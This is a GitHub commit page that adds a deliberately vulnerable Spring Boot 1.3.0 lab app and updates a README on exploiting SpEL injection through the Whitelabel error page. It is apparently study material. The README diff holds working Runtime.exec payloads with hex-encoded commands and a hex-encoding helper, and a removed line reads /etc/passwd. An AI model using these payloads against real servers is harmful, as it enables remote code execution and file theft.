Commit afa6635

committed

add springboot-spel-rce environment

1 parent df14fdf commit afa6635Copy full SHA for afa6635

File tree

7 files changed

+112

-10

lines changed

.gitignore
README.md
repository/springboot-spel-rce
- pom.xml
- springboot-spel-rce.iml
- src/main
  - java/code/landgrey
    - Application.java
    - controller
      - Article.java
  - resources
    - application.properties

7 files changed

+112

-10

lines changed

`‎.gitignore`

Lines changed: 4 additions & 1 deletion

Original file line number	Diff line number	Diff line change
`@@ -1,2 +1,5 @@`
`1`		`-`
`2`	`1`	`.DS_Store`
	`2`	`+`
	`3`	`+`
	`4`	`+/target/`
	`5`	`+/.idea/`

`‎README.md`

Lines changed: 40 additions & 9 deletions

Original file line number	Diff line number	Diff line change
`@@ -141,6 +141,8 @@ SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全`
`141`	`141`
`142`	`142`	`### 0x03:获取星号*遮掩的密码明文`
`143`	`143`
	`144`	`+> 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password)的属性名对应的属性值用 * 号替换达到脱敏的效果`
	`145`	`+`
`144`	`146`	`#### 利用条件:`
`145`	`147`
`146`	`148`	- 可以 GET 请求目标网站的 `/env`
`@@ -251,7 +253,7 @@ Authorization: Basic dmFsdWU6MTIzNDU2`
`251`	`253`
`252`	`254`	`#### 利用条件:`
`253`	`255`
`254`		`-- spring boot < 1.2.8`
	`256`	`+- spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0`
`255`	`257`	`- 至少知道一个触发 springboot 默认错误页面的接口及参数名`
`256`	`258`
`257`	`259`
`@@ -266,28 +268,57 @@ Authorization: Basic dmFsdWU6MTIzNDU2`
`266`	`268`
`267`	`269`	`##### 步骤二:执行 SpEL 表达式`
`268`	`270`
`269`		-输入 `/article?id=A${77}A` ,如果发现报错页面将 77 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。
	`271`	+输入 `/article?id=${77}` ,如果发现报错页面将 77 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。
`270`	`272`
	`273`	+由字符串格式转换成 `0x**` java 字节形式,方便执行任意代码:
`271`	`274`
	`275`	+```python
	`276`	`+# coding: utf-8`
`272`	`277`
`273`		-```java
`274`		`-# 执行 cat /etc/passwd 命令并获得回显 payload SpEL 表达式`
	`278`	`+result = ""`
	`279`	`+target = 'open -a Calculator'`
	`280`	`+for x in target:`
	`281`	`+ result += hex(ord(x)) + ","`
	`282`	`+print(result.rstrip(','))`
	`283`	+```
`275`	`284`
`276`		`-${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x63,0x61,0x74,0x20,0x2f,0x65,0x74,0x63,0x2f,0x70,0x61,0x73,0x73,0x77,0x64})).getInputStream())}`
	`285`	+执行 `open -a Calculator` 命令
	`286`	`+`
	`287`	+```java
	`288`	`+${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}`
`277`	`289`	```
`278`	`290`
`279`	`291`
`280`	`292`
`281`	`293`	`#### 漏洞原理:`
`282`	`294`
`283`		`-1. spring boot 处理参数值出错,流程进入显示默认 Whitelabel Error Page 500 错误页面`
`284`		`-2. 此时 URL 中的参数值会用 SpEL 进行解析,其中携带的 SpEL 表达式就会被执行,造成 RCE 漏洞`
	`295`	+1. spring boot 处理参数值出错,流程进入 `org.springframework.util.PropertyPlaceholderHelper` 类中
	`296`	+2. 此时 URL 中的参数值会用 `parseStringValue` 方法进行递归解析
	`297`	+3. 其中 `${}` 包围的内容都会被 `org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration` 类的 `resolvePlaceholder` 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞
`285`	`298`
`286`	`299`
`287`	`300`
`288`	`301`	`#### 漏洞分析:`
`289`	`302`
`290`		`- [RCE-Springs](https://deadpool.sh/2017/RCE-Springs/)`
	`303`	`+ [SpringBoot SpEL表达式注入漏洞-分析与复现](https://www.cnblogs.com/litlife/p/10183137.html)`
	`304`	`+`
	`305`	`+`
	`306`	`+`
	`307`	`+#### 漏洞环境:`
	`308`	`+`
	`309`	`+[repository/springboot-spel-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce)`
	`310`	`+`
	`311`	`+正常访问:`
	`312`	`+`
	`313`	+```
	`314`	`+http://127.0.0.1:9091/article?id=66`
	`315`	+```
	`316`	`+`
	`317`	+执行 `open -a Calculator` 命令:
	`318`	`+`
	`319`	+```java
	`320`	`+http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}`
	`321`	+```
`291`	`322`
`292`	`323`
`293`	`324`
`@@ -398,7 +429,7 @@ Content-Type: application/json`
`398`	`429`
`399`	`430`	- 可以 POST 请求目标网站的 `/env` 接口设置属性
`400`	`431`	- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖)
`401`		-- 目标使用的 `Eureka-Client < 1.8.7`(通常包含在 `spring-cloud-starter-netflix-eureka-client` 依赖中)
	`432`	+- 目标使用的 `eureka-client` < 1.8.7(通常包含在 `spring-cloud-starter-netflix-eureka-client` 依赖中)
`402`	`433`	`- 目标可以请求攻击者的 HTTP 服务器(请求可出外网)`
`403`	`434`
`404`	`435`

`‎repository/springboot-spel-rce/pom.xml`

Lines changed: 37 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,37 @@`
	`1`	`+<?xml version="1.0" encoding="UTF-8"?>`
	`2`	`+<project xmlns="http://maven.apache.org/POM/4.0.0"`
	`3`	`+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"`
	`4`	`+ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">`
	`5`	`+ <modelVersion>4.0.0</modelVersion>`
	`6`	`+`
	`7`	`+ <groupId>org.example</groupId>`
	`8`	`+ <artifactId>springboot-spel-rce</artifactId>`
	`9`	`+ <version>1.0-SNAPSHOT</version>`
	`10`	`+`
	`11`	`+ <properties>`
	`12`	`+ <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>`
	`13`	`+ <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>`
	`14`	`+ <java.version>1.7</java.version>`
	`15`	`+ <!-- version 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0 will be SpEL rce-->`
	`16`	`+ <springboot.version>1.3.0.RELEASE</springboot.version>`
	`17`	`+ </properties>`
	`18`	`+`
	`19`	`+ <dependencies>`
	`20`	`+ <dependency>`
	`21`	`+ <groupId>org.springframework.boot</groupId>`
	`22`	`+ <artifactId>spring-boot-starter-web</artifactId>`
	`23`	`+ <version>${springboot.version}</version>`
	`24`	`+ </dependency>`
	`25`	`+ </dependencies>`
	`26`	`+`
	`27`	`+ <build>`
	`28`	`+ <plugins>`
	`29`	`+ <plugin>`
	`30`	`+ <groupId>org.springframework.boot</groupId>`
	`31`	`+ <artifactId>spring-boot-maven-plugin</artifactId>`
	`32`	`+ <version>${springboot.version}</version>`
	`33`	`+ </plugin>`
	`34`	`+ </plugins>`
	`35`	`+ </build>`
	`36`	`+`
	`37`	`+</project>`

`‎repository/springboot-spel-rce/springboot-spel-rce.iml`

Lines changed: 2 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+<?xml version="1.0" encoding="UTF-8"?>`
	`2`	`+<module type="JAVA_MODULE" version="4" />`

`‎repository/springboot-spel-rce/src/main/java/code/landgrey/Application.java`

Lines changed: 11 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,11 @@`
	`1`	`+package code.landgrey;`
	`2`	`+`
	`3`	`+import org.springframework.boot.SpringApplication;`
	`4`	`+import org.springframework.boot.autoconfigure.SpringBootApplication;`
	`5`	`+`
	`6`	`+@SpringBootApplication`
	`7`	`+public class Application {`
	`8`	`+ public static void main(String[] args){`
	`9`	`+ SpringApplication.run(Application.class,args);`
	`10`	`+ }`
	`11`	`+}`

`‎repository/springboot-spel-rce/src/main/java/code/landgrey/controller/Article.java`

Lines changed: 16 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,16 @@`
	`1`	`+package code.landgrey.controller;`
	`2`	`+`
	`3`	`+import org.springframework.boot.autoconfigure.EnableAutoConfiguration;`
	`4`	`+import org.springframework.web.bind.annotation.RequestMapping;`
	`5`	`+import org.springframework.web.bind.annotation.RestController;`
	`6`	`+`
	`7`	`+@RestController`
	`8`	`+@EnableAutoConfiguration`
	`9`	`+public class Article {`
	`10`	`+ @RequestMapping("/article")`
	`11`	`+ public String hello(String id){`
	`12`	`+ int total = 100;`
	`13`	`+ String message = String.format("You've read %s books, and there are %d left", id, total - Integer.valueOf(id));`
	`14`	`+ return message;`
	`15`	`+ }`
	`16`	`+}`

`‎repository/springboot-spel-rce/src/main/resources/application.properties`

Lines changed: 2 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+server.port=9091`
	`2`	`+server.address=127.0.0.1`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit afa6635

File tree

7 files changed

7 files changed

`‎.gitignore`

`‎README.md`

`‎repository/springboot-spel-rce/pom.xml`

`‎repository/springboot-spel-rce/springboot-spel-rce.iml`

`‎repository/springboot-spel-rce/src/main/java/code/landgrey/Application.java`

`‎repository/springboot-spel-rce/src/main/java/code/landgrey/controller/Article.java`

`‎repository/springboot-spel-rce/src/main/resources/application.properties`

0 commit comments